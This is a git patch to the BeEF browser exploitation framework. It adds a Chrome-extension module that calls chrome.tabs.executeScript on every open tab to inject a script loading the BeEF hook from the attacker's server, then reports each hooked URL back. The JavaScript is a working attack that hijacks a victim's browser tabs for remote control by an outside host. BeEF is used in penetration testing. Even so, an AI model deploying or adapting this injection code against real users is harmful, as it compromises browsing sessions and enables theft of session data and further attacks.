From 8037d46d94bd19da0698bf6dd7ec8f90cc2e6283 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Sun, 25 Sep 2011 13:08:29 +0000
Subject: [PATCH] (Fixes issue 507): added Chrome extension exploit that
 injects the BeEF hook on all the available tabs. Works great!

git-svn-id: https://beef.googlecode.com/svn/trunk@1309 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../chrome_extensions/inject_beef/command.js  | 26 +++++++++++++++++++
 .../chrome_extensions/inject_beef/config.yaml | 10 +++++++
 .../chrome_extensions/inject_beef/module.rb   |  9 +++++++
 3 files changed, 45 insertions(+)
 create mode 100755 modules/chrome_extensions/inject_beef/command.js
 create mode 100755 modules/chrome_extensions/inject_beef/config.yaml
 create mode 100755 modules/chrome_extensions/inject_beef/module.rb

diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js
new file mode 100755
index 000000000..7dc843abf
--- /dev/null
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -0,0 +1,26 @@
+beef.execute(function() {
+
+        var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+
+        chrome.windows.getAll({"populate" : true}, function(windows) {
+			for(i in windows) {
+				if(windows[i].type=="normal") {
+					chrome.tabs.getAllInWindow(windows[i].id,function(tabs){
+						for(t in tabs) {
+                            //antisnatchor: if the extension has her own tabs open, we want to precent injecting the hook
+                            //also there. Chrome extensions with tabs and http/s permissions cannot access URIs with protocol
+                            // handlers chrome-extension://, and most of them will not have permissions to do so.
+                            if(tabs[t].url.substring(0,16) != "chrome-extension"){
+                                chrome.tabs.executeScript(tabs[t].id,{code:"newScript=document.createElement('script'); newScript.src='"
+                                    + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"})
+
+						        //send back the new domain that will be hooked :-)
+                                beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Succesfully injected BeEF hook on: ' + tabs[t].url);
+                            }
+						}
+					})
+				}
+			}
+		});
+});
+
diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml
new file mode 100755
index 000000000..73be08789
--- /dev/null
+++ b/modules/chrome_extensions/inject_beef/config.yaml
@@ -0,0 +1,10 @@
+beef:
+    module:
+        inject_beef:
+            enable: true
+            category: "Chrome Extensions"
+            name: "Inject BeEF"
+            description: "Attempt to inject the BeEF hook on all the available tabs."
+            authors: ["Kos", "antisnatchor"]
+            target:
+                working: ["C"]
diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb
new file mode 100755
index 000000000..3397f82a6
--- /dev/null
+++ b/modules/chrome_extensions/inject_beef/module.rb
@@ -0,0 +1,9 @@
+class Inject_beef < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Return'] = @datastore['return']
+    save content
+  end
+  
+end